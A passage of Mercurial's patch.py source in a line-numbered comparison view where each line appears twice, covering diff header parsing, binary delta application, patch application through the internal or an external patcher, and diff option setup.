1900 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1901 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1901 if not gitpatches:
1902 if not gitpatches:
1902 raise PatchError(_('failed to synchronize metadata for "%s"')
1903 raise PatchError(_('failed to synchronize metadata for "%s"')
1903 % afile[2:])
1904 % afile[2:])
1904 gp = gitpatches[-1]
1905 gp = gitpatches[-1]
1905 newfile = True
1906 newfile = True
1906 elif x.startswith('---'):
1907 elif x.startswith('---'):
1907 # check for a unified diff
1908 # check for a unified diff
1908 l2 = lr.readline()
1909 l2 = lr.readline()
1909 if not l2.startswith('+++'):
1910 if not l2.startswith('+++'):
1910 lr.push(l2)
1911 lr.push(l2)
1911 continue
1912 continue
1912 newfile = True
1913 newfile = True
1913 context = False
1914 context = False
1914 afile = parsefilename(x)
1915 afile = parsefilename(x)
1915 bfile = parsefilename(l2)
1916 bfile = parsefilename(l2)
1916 elif x.startswith('***'):
1917 elif x.startswith('***'):
1917 # check for a context diff
1918 # check for a context diff
1918 l2 = lr.readline()
1919 l2 = lr.readline()
1919 if not l2.startswith('---'):
1920 if not l2.startswith('---'):
1920 lr.push(l2)
1921 lr.push(l2)
1921 continue
1922 continue
1922 l3 = lr.readline()
1923 l3 = lr.readline()
1923 lr.push(l3)
1924 lr.push(l3)
1924 if not l3.startswith("***************"):
1925 if not l3.startswith("***************"):
1925 lr.push(l2)
1926 lr.push(l2)
1926 continue
1927 continue
1927 newfile = True
1928 newfile = True
1928 context = True
1929 context = True
1929 afile = parsefilename(x)
1930 afile = parsefilename(x)
1930 bfile = parsefilename(l2)
1931 bfile = parsefilename(l2)
1931
1932
1932 if newfile:
1933 if newfile:
1933 newfile = False
1934 newfile = False
1934 emitfile = True
1935 emitfile = True
1935 state = BFILE
1936 state = BFILE
1936 hunknum = 0
1937 hunknum = 0
1937
1938
1938 while gitpatches:
1939 while gitpatches:
1939 gp = gitpatches.pop()
1940 gp = gitpatches.pop()
1940 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1941 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1941
1942
1942 def applybindelta(binchunk, data):
1943 def applybindelta(binchunk, data):
1943 """Apply a binary delta hunk
1944 """Apply a binary delta hunk
1944 The algorithm used is the algorithm from git's patch-delta.c
1945 The algorithm used is the algorithm from git's patch-delta.c
1945 """
1946 """
1946 def deltahead(binchunk):
1947 def deltahead(binchunk):
1947 i = 0
1948 i = 0
1948 for c in pycompat.bytestr(binchunk):
1949 for c in pycompat.bytestr(binchunk):
1949 i += 1
1950 i += 1
1950 if not (ord(c) & 0x80):
1951 if not (ord(c) & 0x80):
1951 return i
1952 return i
1952 return i
1953 return i
1953 out = ""
1954 out = ""
1954 s = deltahead(binchunk)
1955 s = deltahead(binchunk)
1955 binchunk = binchunk[s:]
1956 binchunk = binchunk[s:]
1956 s = deltahead(binchunk)
1957 s = deltahead(binchunk)
1957 binchunk = binchunk[s:]
1958 binchunk = binchunk[s:]
1958 i = 0
1959 i = 0
1959 while i < len(binchunk):
1960 while i < len(binchunk):
1960 cmd = ord(binchunk[i:i + 1])
1961 cmd = ord(binchunk[i:i + 1])
1961 i += 1
1962 i += 1
1962 if (cmd & 0x80):
1963 if (cmd & 0x80):
1963 offset = 0
1964 offset = 0
1964 size = 0
1965 size = 0
1965 if (cmd & 0x01):
1966 if (cmd & 0x01):
1966 offset = ord(binchunk[i:i + 1])
1967 offset = ord(binchunk[i:i + 1])
1967 i += 1
1968 i += 1
1968 if (cmd & 0x02):
1969 if (cmd & 0x02):
1969 offset |= ord(binchunk[i:i + 1]) << 8
1970 offset |= ord(binchunk[i:i + 1]) << 8
1970 i += 1
1971 i += 1
1971 if (cmd & 0x04):
1972 if (cmd & 0x04):
1972 offset |= ord(binchunk[i:i + 1]) << 16
1973 offset |= ord(binchunk[i:i + 1]) << 16
1973 i += 1
1974 i += 1
1974 if (cmd & 0x08):
1975 if (cmd & 0x08):
1975 offset |= ord(binchunk[i:i + 1]) << 24
1976 offset |= ord(binchunk[i:i + 1]) << 24
1976 i += 1
1977 i += 1
1977 if (cmd & 0x10):
1978 if (cmd & 0x10):
1978 size = ord(binchunk[i:i + 1])
1979 size = ord(binchunk[i:i + 1])
1979 i += 1
1980 i += 1
1980 if (cmd & 0x20):
1981 if (cmd & 0x20):
1981 size |= ord(binchunk[i:i + 1]) << 8
1982 size |= ord(binchunk[i:i + 1]) << 8
1982 i += 1
1983 i += 1
1983 if (cmd & 0x40):
1984 if (cmd & 0x40):
1984 size |= ord(binchunk[i:i + 1]) << 16
1985 size |= ord(binchunk[i:i + 1]) << 16
1985 i += 1
1986 i += 1
1986 if size == 0:
1987 if size == 0:
1987 size = 0x10000
1988 size = 0x10000
1988 offset_end = offset + size
1989 offset_end = offset + size
1989 out += data[offset:offset_end]
1990 out += data[offset:offset_end]
1990 elif cmd != 0:
1991 elif cmd != 0:
1991 offset_end = i + cmd
1992 offset_end = i + cmd
1992 out += binchunk[i:offset_end]
1993 out += binchunk[i:offset_end]
1993 i += cmd
1994 i += cmd
1994 else:
1995 else:
1995 raise PatchError(_('unexpected delta opcode 0'))
1996 raise PatchError(_('unexpected delta opcode 0'))
1996 return out
1997 return out
1997
1998
1998 def applydiff(ui, fp, backend, store, strip=1, prefix='', eolmode='strict'):
1999 def applydiff(ui, fp, backend, store, strip=1, prefix='', eolmode='strict'):
1999 """Reads a patch from fp and tries to apply it.
2000 """Reads a patch from fp and tries to apply it.
2000
2001
2001 Returns 0 for a clean patch, -1 if any rejects were found and 1 if
2002 Returns 0 for a clean patch, -1 if any rejects were found and 1 if
2002 there was any fuzz.
2003 there was any fuzz.
2003
2004
2004 If 'eolmode' is 'strict', the patch content and patched file are
2005 If 'eolmode' is 'strict', the patch content and patched file are
2005 read in binary mode. Otherwise, line endings are ignored when
2006 read in binary mode. Otherwise, line endings are ignored when
2006 patching then normalized according to 'eolmode'.
2007 patching then normalized according to 'eolmode'.
2007 """
2008 """
2008 return _applydiff(ui, fp, patchfile, backend, store, strip=strip,
2009 return _applydiff(ui, fp, patchfile, backend, store, strip=strip,
2009 prefix=prefix, eolmode=eolmode)
2010 prefix=prefix, eolmode=eolmode)
2010
2011
2011 def _canonprefix(repo, prefix):
2012 def _canonprefix(repo, prefix):
2012 if prefix:
2013 if prefix:
2013 prefix = pathutil.canonpath(repo.root, repo.getcwd(), prefix)
2014 prefix = pathutil.canonpath(repo.root, repo.getcwd(), prefix)
2014 if prefix != '':
2015 if prefix != '':
2015 prefix += '/'
2016 prefix += '/'
2016 return prefix
2017 return prefix
2017
2018
2018 def _applydiff(ui, fp, patcher, backend, store, strip=1, prefix='',
2019 def _applydiff(ui, fp, patcher, backend, store, strip=1, prefix='',
2019 eolmode='strict'):
2020 eolmode='strict'):
2020 prefix = _canonprefix(backend.repo, prefix)
2021 prefix = _canonprefix(backend.repo, prefix)
2021 def pstrip(p):
2022 def pstrip(p):
2022 return pathtransform(p, strip - 1, prefix)[1]
2023 return pathtransform(p, strip - 1, prefix)[1]
2023
2024
2024 rejects = 0
2025 rejects = 0
2025 err = 0
2026 err = 0
2026 current_file = None
2027 current_file = None
2027
2028
2028 for state, values in iterhunks(fp):
2029 for state, values in iterhunks(fp):
2029 if state == 'hunk':
2030 if state == 'hunk':
2030 if not current_file:
2031 if not current_file:
2031 continue
2032 continue
2032 ret = current_file.apply(values)
2033 ret = current_file.apply(values)
2033 if ret > 0:
2034 if ret > 0:
2034 err = 1
2035 err = 1
2035 elif state == 'file':
2036 elif state == 'file':
2036 if current_file:
2037 if current_file:
2037 rejects += current_file.close()
2038 rejects += current_file.close()
2038 current_file = None
2039 current_file = None
2039 afile, bfile, first_hunk, gp = values
2040 afile, bfile, first_hunk, gp = values
2040 if gp:
2041 if gp:
2041 gp.path = pstrip(gp.path)
2042 gp.path = pstrip(gp.path)
2042 if gp.oldpath:
2043 if gp.oldpath:
2043 gp.oldpath = pstrip(gp.oldpath)
2044 gp.oldpath = pstrip(gp.oldpath)
2044 else:
2045 else:
2045 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2046 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2046 prefix)
2047 prefix)
2047 if gp.op == 'RENAME':
2048 if gp.op == 'RENAME':
2048 backend.unlink(gp.oldpath)
2049 backend.unlink(gp.oldpath)
2049 if not first_hunk:
2050 if not first_hunk:
2050 if gp.op == 'DELETE':
2051 if gp.op == 'DELETE':
2051 backend.unlink(gp.path)
2052 backend.unlink(gp.path)
2052 continue
2053 continue
2053 data, mode = None, None
2054 data, mode = None, None
2054 if gp.op in ('RENAME', 'COPY'):
2055 if gp.op in ('RENAME', 'COPY'):
2055 data, mode = store.getfile(gp.oldpath)[:2]
2056 data, mode = store.getfile(gp.oldpath)[:2]
2056 if data is None:
2057 if data is None:
2057 # This means that the old path does not exist
2058 # This means that the old path does not exist
2058 raise PatchError(_("source file '%s' does not exist")
2059 raise PatchError(_("source file '%s' does not exist")
2059 % gp.oldpath)
2060 % gp.oldpath)
2060 if gp.mode:
2061 if gp.mode:
2061 mode = gp.mode
2062 mode = gp.mode
2062 if gp.op == 'ADD':
2063 if gp.op == 'ADD':
2063 # Added files without content have no hunk and
2064 # Added files without content have no hunk and
2064 # must be created
2065 # must be created
2065 data = ''
2066 data = ''
2066 if data or mode:
2067 if data or mode:
2067 if (gp.op in ('ADD', 'RENAME', 'COPY')
2068 if (gp.op in ('ADD', 'RENAME', 'COPY')
2068 and backend.exists(gp.path)):
2069 and backend.exists(gp.path)):
2069 raise PatchError(_("cannot create %s: destination "
2070 raise PatchError(_("cannot create %s: destination "
2070 "already exists") % gp.path)
2071 "already exists") % gp.path)
2071 backend.setfile(gp.path, data, mode, gp.oldpath)
2072 backend.setfile(gp.path, data, mode, gp.oldpath)
2072 continue
2073 continue
2073 try:
2074 try:
2074 current_file = patcher(ui, gp, backend, store,
2075 current_file = patcher(ui, gp, backend, store,
2075 eolmode=eolmode)
2076 eolmode=eolmode)
2076 except PatchError as inst:
2077 except PatchError as inst:
2077 ui.warn(str(inst) + '\n')
2078 ui.warn(str(inst) + '\n')
2078 current_file = None
2079 current_file = None
2079 rejects += 1
2080 rejects += 1
2080 continue
2081 continue
2081 elif state == 'git':
2082 elif state == 'git':
2082 for gp in values:
2083 for gp in values:
2083 path = pstrip(gp.oldpath)
2084 path = pstrip(gp.oldpath)
2084 data, mode = backend.getfile(path)
2085 data, mode = backend.getfile(path)
2085 if data is None:
2086 if data is None:
2086 # The error ignored here will trigger a getfile()
2087 # The error ignored here will trigger a getfile()
2087 # error in a place more appropriate for error
2088 # error in a place more appropriate for error
2088 # handling, and will not interrupt the patching
2089 # handling, and will not interrupt the patching
2089 # process.
2090 # process.
2090 pass
2091 pass
2091 else:
2092 else:
2092 store.setfile(path, data, mode)
2093 store.setfile(path, data, mode)
2093 else:
2094 else:
2094 raise error.Abort(_('unsupported parser state: %s') % state)
2095 raise error.Abort(_('unsupported parser state: %s') % state)
2095
2096
2096 if current_file:
2097 if current_file:
2097 rejects += current_file.close()
2098 rejects += current_file.close()
2098
2099
2099 if rejects:
2100 if rejects:
2100 return -1
2101 return -1
2101 return err
2102 return err
2102
2103
2103 def _externalpatch(ui, repo, patcher, patchname, strip, files,
2104 def _externalpatch(ui, repo, patcher, patchname, strip, files,
2104 similarity):
2105 similarity):
2105 """use <patcher> to apply <patchname> to the working directory.
2106 """use <patcher> to apply <patchname> to the working directory.
2106 returns whether patch was applied with fuzz factor."""
2107 returns whether patch was applied with fuzz factor."""
2107
2108
2108 fuzz = False
2109 fuzz = False
2109 args = []
2110 args = []
2110 cwd = repo.root
2111 cwd = repo.root
2111 if cwd:
2112 if cwd:
2112 args.append('-d %s' % procutil.shellquote(cwd))
2113 args.append('-d %s' % procutil.shellquote(cwd))
2113 cmd = ('%s %s -p%d < %s'
2114 cmd = ('%s %s -p%d < %s'
2114 % (patcher, ' '.join(args), strip, procutil.shellquote(patchname)))
2115 % (patcher, ' '.join(args), strip, procutil.shellquote(patchname)))
2115 ui.debug('Using external patch tool: %s\n' % cmd)
2116 ui.debug('Using external patch tool: %s\n' % cmd)
2116 fp = procutil.popen(cmd, 'rb')
2117 fp = procutil.popen(cmd, 'rb')
2117 try:
2118 try:
2118 for line in util.iterfile(fp):
2119 for line in util.iterfile(fp):
2119 line = line.rstrip()
2120 line = line.rstrip()
2120 ui.note(line + '\n')
2121 ui.note(line + '\n')
2121 if line.startswith('patching file '):
2122 if line.startswith('patching file '):
2122 pf = util.parsepatchoutput(line)
2123 pf = util.parsepatchoutput(line)
2123 printed_file = False
2124 printed_file = False
2124 files.add(pf)
2125 files.add(pf)
2125 elif line.find('with fuzz') >= 0:
2126 elif line.find('with fuzz') >= 0:
2126 fuzz = True
2127 fuzz = True
2127 if not printed_file:
2128 if not printed_file:
2128 ui.warn(pf + '\n')
2129 ui.warn(pf + '\n')
2129 printed_file = True
2130 printed_file = True
2130 ui.warn(line + '\n')
2131 ui.warn(line + '\n')
2131 elif line.find('saving rejects to file') >= 0:
2132 elif line.find('saving rejects to file') >= 0:
2132 ui.warn(line + '\n')
2133 ui.warn(line + '\n')
2133 elif line.find('FAILED') >= 0:
2134 elif line.find('FAILED') >= 0:
2134 if not printed_file:
2135 if not printed_file:
2135 ui.warn(pf + '\n')
2136 ui.warn(pf + '\n')
2136 printed_file = True
2137 printed_file = True
2137 ui.warn(line + '\n')
2138 ui.warn(line + '\n')
2138 finally:
2139 finally:
2139 if files:
2140 if files:
2140 scmutil.marktouched(repo, files, similarity)
2141 scmutil.marktouched(repo, files, similarity)
2141 code = fp.close()
2142 code = fp.close()
2142 if code:
2143 if code:
2143 raise PatchError(_("patch command failed: %s") %
2144 raise PatchError(_("patch command failed: %s") %
2144 procutil.explainexit(code))
2145 procutil.explainexit(code))
2145 return fuzz
2146 return fuzz
2146
2147
2147 def patchbackend(ui, backend, patchobj, strip, prefix, files=None,
2148 def patchbackend(ui, backend, patchobj, strip, prefix, files=None,
2148 eolmode='strict'):
2149 eolmode='strict'):
2149 if files is None:
2150 if files is None:
2150 files = set()
2151 files = set()
2151 if eolmode is None:
2152 if eolmode is None:
2152 eolmode = ui.config('patch', 'eol')
2153 eolmode = ui.config('patch', 'eol')
2153 if eolmode.lower() not in eolmodes:
2154 if eolmode.lower() not in eolmodes:
2154 raise error.Abort(_('unsupported line endings type: %s') % eolmode)
2155 raise error.Abort(_('unsupported line endings type: %s') % eolmode)
2155 eolmode = eolmode.lower()
2156 eolmode = eolmode.lower()
2156
2157
2157 store = filestore()
2158 store = filestore()
2158 try:
2159 try:
2159 fp = open(patchobj, 'rb')
2160 fp = open(patchobj, 'rb')
2160 except TypeError:
2161 except TypeError:
2161 fp = patchobj
2162 fp = patchobj
2162 try:
2163 try:
2163 ret = applydiff(ui, fp, backend, store, strip=strip, prefix=prefix,
2164 ret = applydiff(ui, fp, backend, store, strip=strip, prefix=prefix,
2164 eolmode=eolmode)
2165 eolmode=eolmode)
2165 finally:
2166 finally:
2166 if fp != patchobj:
2167 if fp != patchobj:
2167 fp.close()
2168 fp.close()
2168 files.update(backend.close())
2169 files.update(backend.close())
2169 store.close()
2170 store.close()
2170 if ret < 0:
2171 if ret < 0:
2171 raise PatchError(_('patch failed to apply'))
2172 raise PatchError(_('patch failed to apply'))
2172 return ret > 0
2173 return ret > 0
2173
2174
2174 def internalpatch(ui, repo, patchobj, strip, prefix='', files=None,
2175 def internalpatch(ui, repo, patchobj, strip, prefix='', files=None,
2175 eolmode='strict', similarity=0):
2176 eolmode='strict', similarity=0):
2176 """use builtin patch to apply <patchobj> to the working directory.
2177 """use builtin patch to apply <patchobj> to the working directory.
2177 returns whether patch was applied with fuzz factor."""
2178 returns whether patch was applied with fuzz factor."""
2178 backend = workingbackend(ui, repo, similarity)
2179 backend = workingbackend(ui, repo, similarity)
2179 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2180 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2180
2181
2181 def patchrepo(ui, repo, ctx, store, patchobj, strip, prefix, files=None,
2182 def patchrepo(ui, repo, ctx, store, patchobj, strip, prefix, files=None,
2182 eolmode='strict'):
2183 eolmode='strict'):
2183 backend = repobackend(ui, repo, ctx, store)
2184 backend = repobackend(ui, repo, ctx, store)
2184 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2185 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2185
2186
2186 def patch(ui, repo, patchname, strip=1, prefix='', files=None, eolmode='strict',
2187 def patch(ui, repo, patchname, strip=1, prefix='', files=None, eolmode='strict',
2187 similarity=0):
2188 similarity=0):
2188 """Apply <patchname> to the working directory.
2189 """Apply <patchname> to the working directory.
2189
2190
2190 'eolmode' specifies how end of lines should be handled. It can be:
2191 'eolmode' specifies how end of lines should be handled. It can be:
2191 - 'strict': inputs are read in binary mode, EOLs are preserved
2192 - 'strict': inputs are read in binary mode, EOLs are preserved
2192 - 'crlf': EOLs are ignored when patching and reset to CRLF
2193 - 'crlf': EOLs are ignored when patching and reset to CRLF
2193 - 'lf': EOLs are ignored when patching and reset to LF
2194 - 'lf': EOLs are ignored when patching and reset to LF
2194 - None: get it from user settings, default to 'strict'
2195 - None: get it from user settings, default to 'strict'
2195 'eolmode' is ignored when using an external patcher program.
2196 'eolmode' is ignored when using an external patcher program.
2196
2197
2197 Returns whether patch was applied with fuzz factor.
2198 Returns whether patch was applied with fuzz factor.
2198 """
2199 """
2199 patcher = ui.config('ui', 'patch')
2200 patcher = ui.config('ui', 'patch')
2200 if files is None:
2201 if files is None:
2201 files = set()
2202 files = set()
2202 if patcher:
2203 if patcher:
2203 return _externalpatch(ui, repo, patcher, patchname, strip,
2204 return _externalpatch(ui, repo, patcher, patchname, strip,
2204 files, similarity)
2205 files, similarity)
2205 return internalpatch(ui, repo, patchname, strip, prefix, files, eolmode,
2206 return internalpatch(ui, repo, patchname, strip, prefix, files, eolmode,
2206 similarity)
2207 similarity)
2207
2208
2208 def changedfiles(ui, repo, patchpath, strip=1, prefix=''):
2209 def changedfiles(ui, repo, patchpath, strip=1, prefix=''):
2209 backend = fsbackend(ui, repo.root)
2210 backend = fsbackend(ui, repo.root)
2210 prefix = _canonprefix(repo, prefix)
2211 prefix = _canonprefix(repo, prefix)
2211 with open(patchpath, 'rb') as fp:
2212 with open(patchpath, 'rb') as fp:
2212 changed = set()
2213 changed = set()
2213 for state, values in iterhunks(fp):
2214 for state, values in iterhunks(fp):
2214 if state == 'file':
2215 if state == 'file':
2215 afile, bfile, first_hunk, gp = values
2216 afile, bfile, first_hunk, gp = values
2216 if gp:
2217 if gp:
2217 gp.path = pathtransform(gp.path, strip - 1, prefix)[1]
2218 gp.path = pathtransform(gp.path, strip - 1, prefix)[1]
2218 if gp.oldpath:
2219 if gp.oldpath:
2219 gp.oldpath = pathtransform(gp.oldpath, strip - 1,
2220 gp.oldpath = pathtransform(gp.oldpath, strip - 1,
2220 prefix)[1]
2221 prefix)[1]
2221 else:
2222 else:
2222 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2223 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2223 prefix)
2224 prefix)
2224 changed.add(gp.path)
2225 changed.add(gp.path)
2225 if gp.op == 'RENAME':
2226 if gp.op == 'RENAME':
2226 changed.add(gp.oldpath)
2227 changed.add(gp.oldpath)
2227 elif state not in ('hunk', 'git'):
2228 elif state not in ('hunk', 'git'):
2228 raise error.Abort(_('unsupported parser state: %s') % state)
2229 raise error.Abort(_('unsupported parser state: %s') % state)
2229 return changed
2230 return changed
2230
2231
2231 class GitDiffRequired(Exception):
2232 class GitDiffRequired(Exception):
2232 pass
2233 pass
2233
2234
2234 def diffallopts(ui, opts=None, untrusted=False, section='diff'):
2235 def diffallopts(ui, opts=None, untrusted=False, section='diff'):
2235 '''return diffopts with all features supported and parsed'''
2236 '''return diffopts with all features supported and parsed'''
2236 return difffeatureopts(ui, opts=opts, untrusted=untrusted, section=section,
2237 return difffeatureopts(ui, opts=opts, untrusted=untrusted, section=section,
2237 git=True, whitespace=True, formatchanging=True)
2238 git=True, whitespace=True, formatchanging=True)
2238
2239
2239 diffopts = diffallopts
2240 diffopts = diffallopts
2240
2241
2241 def difffeatureopts(ui, opts=None, untrusted=False, section='diff', git=False,
2242 def difffeatureopts(ui, opts=None, untrusted=False, section='diff', git=False,
2242 whitespace=False, formatchanging=False):
2243 whitespace=False, formatchanging=False):
2243 '''return diffopts with only opted-in features parsed
2244 '''return diffopts with only opted-in features parsed
2244
2245
2245 Features:
2246 Features:
2246 - git: git-style diffs
2247 - git: git-style diffs
2247 - whitespace: whitespace options like ignoreblanklines and ignorews
2248 - whitespace: whitespace options like ignoreblanklines and ignorews
2248 - formatchanging: options that will likely break or cause correctness issues
2249 - formatchanging: options that will likely break or cause correctness issues
2249 with most diff parsers
2250 with most diff parsers
2250 '''
2251 '''
2251 def get(key, name=None, getter=ui.configbool, forceplain=None):
2252 def get(key, name=None, getter=ui.configbool, forceplain=None):
2252 if opts:
2253 if opts:
2253 v = opts.get(key)
2254 v = opts.get(key)
2254 # diffopts flags are either None-default (which is passed
2255 # diffopts flags are either None-default (which is passed
2255 # through unchanged, so we can identify unset values), or
2256 # through unchanged, so we can identify unset values), or
2256 # some other falsey default (eg --unified, which defaults
2257 # some other falsey default (eg --unified, which defaults
2257 # to an empty string). We only want to override the config
2258 # to an empty string). We only want to override the config
2258 # entries from hgrc with command line values if they
2259 # entries from hgrc with command line values if they
2259 # appear to have been set, which is any truthy value,
2260 # appear to have been set, which is any truthy value,
2260 # True, or False.
2261 # True, or False.
2261 if v or isinstance(v, bool):
2262 if v or isinstance(v, bool):
2262 return v
2263 return v
2263 if forceplain is not None and ui.plain():
2264 if forceplain is not None and ui.plain():
2264 return forceplain
2265 return forceplain
2265 return getter(section, name or key, untrusted=untrusted)
2266 return getter(section, name or key, untrusted=untrusted)
2266
2267
2267 # core options, expected to be understood by every diff parser
2268 # core options, expected to be understood by every diff parser
2268 buildopts = {
2269 buildopts = {
2269 'nodates': get('nodates'),
2270 'nodates': get('nodates'),
2270 'showfunc': get('show_function', 'showfunc'),
2271 'showfunc': get('show_function', 'showfunc'),
2271 'context': get('unified', getter=ui.config),
2272 'context': get('unified', getter=ui.config),
2272 }
2273 }
2273 buildopts['worddiff'] = ui.configbool('experimental', 'worddiff')
2274 buildopts['worddiff'] = ui.configbool('experimental', 'worddiff')
2274 buildopts['xdiff'] = ui.configbool('experimental', 'xdiff')
2275 buildopts['xdiff'] = ui.configbool('experimental', 'xdiff')
2275
2276
2276 if git:
2277 if git:
2277 buildopts['git'] = get('git')
2278 buildopts['git'] = get('git')
2278
2279
2279 # since this is in the experimental section, we need to call
2280 # since this is in the experimental section, we need to call
2280 # ui.configbool directory
2281 # ui.configbool directory
2281 buildopts['showsimilarity'] = ui.configbool('experimental',
2282 buildopts['showsimilarity'] = ui.configbool('experimental',
2282 'extendedheader.similarity')
2283 'extendedheader.similarity')
2283
2284
2284 # need to inspect the ui object instead of using get() since we want to
2285 # need to inspect the ui object instead of using get() since we want to
2285 # test for an int
2286 # test for an int
2286 hconf = ui.config('experimental', 'extendedheader.index')
2287 hconf = ui.config('experimental', 'extendedheader.index')
2287 if hconf is not None:
2288 if hconf is not None:
2288 hlen = None
2289 hlen = None
2289 try:
2290 try:
2290 # the hash config could be an integer (for length of hash) or a
2291 # the hash config could be an integer (for length of hash) or a
2291 # word (e.g. short, full, none)
2292 # word (e.g. short, full, none)
2292 hlen = int(hconf)
2293 hlen = int(hconf)
2293 if hlen < 0 or hlen > 40:
2294 if hlen < 0 or hlen > 40:
2294 msg = _("invalid length for extendedheader.index: '%d'\n")
2295 msg = _("invalid length for extendedheader.index: '%d'\n")
2295 ui.warn(msg % hlen)
2296 ui.warn(msg % hlen)
2296 except ValueError:
2297 except ValueError:
2297 # default value
2298 # default value
2298 if hconf == 'short' or hconf == '':
2299 if hconf == 'short' or hconf == '':
2299 hlen = 12
2300 hlen = 12
2300 elif hconf == 'full':
2301 elif hconf == 'full':
2301 hlen = 40
2302 hlen = 40
2302 elif hconf != 'none':
2303 elif hconf != 'none':
2303 msg = _("invalid value for extendedheader.index: '%s'\n")
2304 msg = _("invalid value for extendedheader.index: '%s'\n")
2304 ui.warn(msg % hconf)
2305 ui.warn(msg % hconf)
2305 finally:
2306 finally:
2306 buildopts['index'] = hlen
2307 buildopts['index'] = hlen
2307
2308
2308 if whitespace:
2309 if whitespace:
2309 buildopts['ignorews'] = get('ignore_all_space', 'ignorews')
2310 buildopts['ignorews'] = get('ignore_all_space', 'ignorews')
2310 buildopts['ignorewsamount'] = get('ignore_space_change',
2311 buildopts['ignorewsamount'] = get('ignore_space_change',
2311 'ignorewsamount')
2312 'ignorewsamount')
2312 buildopts['ignoreblanklines'] = get('ignore_blank_lines',
2313 buildopts['ignoreblanklines'] = get('ignore_blank_lines',
2313 'ignoreblanklines')
2314 'ignoreblanklines')
2314 buildopts['ignorewseol'] = get('ignore_space_at_eol', 'ignorewseol')
2315 buildopts['ignorewseol'] = get('ignore_space_at_eol', 'ignorewseol')
2315 if formatchanging:
2316 if formatchanging:
2316 buildopts['text'] = opts and opts.get('text')
2317 buildopts['text'] = opts and opts.get('text')
2317 binary = None if opts is None else opts.get('binary')
2318 binary = None if opts is None else opts.get('binary')
2318 buildopts['nobinary'] = (not binary if binary is not None
2319 buildopts['nobinary'] = (not binary if binary is not None
2319 else get('nobinary', forceplain=False))
2320 else get('nobinary', forceplain=False))
2320 buildopts['noprefix'] = get('noprefix', forceplain=False)
2321 buildopts['noprefix'] = get('noprefix', forceplain=False)
2321
2322
2322 return mdiff.diffopts(**pycompat.strkwargs(buildopts))
2323 return mdiff.diffopts(**pycompat.strkwargs(buildopts))
2323
2324
2324 def diff(repo, node1=None, node2=None, match=None, changes=None,
2325 def diff(repo, node1=None, node2=None, match=None, changes=None,
2325 opts=None, losedatafn=None, prefix='', relroot='', copy=None,
2326 opts=None, losedatafn=None, prefix='', relroot='', copy=None,
2326 hunksfilterfn=None):
2327 hunksfilterfn=None):
2327 '''yields diff of changes to files between two nodes, or node and
2328 '''yields diff of changes to files between two nodes, or node and
2328 working directory.
2329 working directory.
2329
2330
2330 if node1 is None, use first dirstate parent instead.
2331 if node1 is None, use first dirstate parent instead.
2331 if node2 is None, compare node1 with working directory.
2332 if node2 is None, compare node1 with working directory.
2332
2333
2333 losedatafn(**kwarg) is a callable run when opts.upgrade=True and
2334 losedatafn(**kwarg) is a callable run when opts.upgrade=True and
2334 every time some change cannot be represented with the current
2335 every time some change cannot be represented with the current
2335 patch format. Return False to upgrade to git patch format, True to
2336 patch format. Return False to upgrade to git patch format, True to
2336 accept the loss or raise an exception to abort the diff. It is
2337 accept the loss or raise an exception to abort the diff. It is
2337 called with the name of current file being diffed as 'fn'. If set
2338 called with the name of current file being diffed as 'fn'. If set
2338 to None, patches will always be upgraded to git format when
2339 to None, patches will always be upgraded to git format when
2339 necessary.
2340 necessary.
2340
2341
2341 prefix is a filename prefix that is prepended to all filenames on
2342 prefix is a filename prefix that is prepended to all filenames on
2342 display (used for subrepos).
2343 display (used for subrepos).
2343
2344
2344 relroot, if not empty, must be normalized with a trailing /. Any match
2345 relroot, if not empty, must be normalized with a trailing /. Any match
2345 patterns that fall outside it will be ignored.
2346 patterns that fall outside it will be ignored.
2346
2347
2347 copy, if not empty, should contain mappings {dst@y: src@x} of copy
2348 copy, if not empty, should contain mappings {dst@y: src@x} of copy
2348 information.
2349 information.
2349
2350
2350 hunksfilterfn, if not None, should be a function taking a filectx and
2351 hunksfilterfn, if not None, should be a function taking a filectx and
2351 hunks generator that may yield filtered hunks.
2352 hunks generator that may yield filtered hunks.
2352 '''
2353 '''
2353 for fctx1, fctx2, hdr, hunks in diffhunks(
2354 for fctx1, fctx2, hdr, hunks in diffhunks(
2354 repo, node1=node1, node2=node2,
2355 repo, node1=node1, node2=node2,
2355 match=match, changes=changes, opts=opts,
2356 match=match, changes=changes, opts=opts,
2356 losedatafn=losedatafn, prefix=prefix, relroot=relroot, copy=copy,
2357 losedatafn=losedatafn, prefix=prefix, relroot=relroot, copy=copy,
2357 ):
2358 ):
2358 if hunksfilterfn is not None:
2359 if hunksfilterfn is not None:
2359 # If the file has been removed, fctx2 is None; but this should
2360 # If the file has been removed, fctx2 is None; but this should
2360 # not occur here since we catch removed files early in
2361 # not occur here since we catch removed files early in
2361 # logcmdutil.getlinerangerevs() for 'hg log -L'.
2362 # logcmdutil.getlinerangerevs() for 'hg log -L'.
2362 assert fctx2 is not None, \
2363 assert fctx2 is not None, \
2363 'fctx2 unexpectly None in diff hunks filtering'
2364 'fctx2 unexpectly None in diff hunks filtering'
2364 hunks = hunksfilterfn(fctx2, hunks)
2365 hunks = hunksfilterfn(fctx2, hunks)
2365 text = ''.join(sum((list(hlines) for hrange, hlines in hunks), []))
2366 text = ''.join(sum((list(hlines) for hrange, hlines in hunks), []))
2366 if hdr and (text or len(hdr) > 1):
2367 if hdr and (text or len(hdr) > 1):
2367 yield '\n'.join(hdr) + '\n'
2368 yield '\n'.join(hdr) + '\n'
2368 if text:
2369 if text:
2369 yield text
2370 yield text
2370
2371
2371 def diffhunks(repo, node1=None, node2=None, match=None, changes=None,
2372 def diffhunks(repo, node1=None, node2=None, match=None, changes=None,
2372 opts=None, losedatafn=None, prefix='', relroot='', copy=None):
2373 opts=None, losedatafn=None, prefix='', relroot='', copy=None):
2373 """Yield diff of changes to files in the form of (`header`, `hunks`) tuples
2374 """Yield diff of changes to files in the form of (`header`, `hunks`) tuples
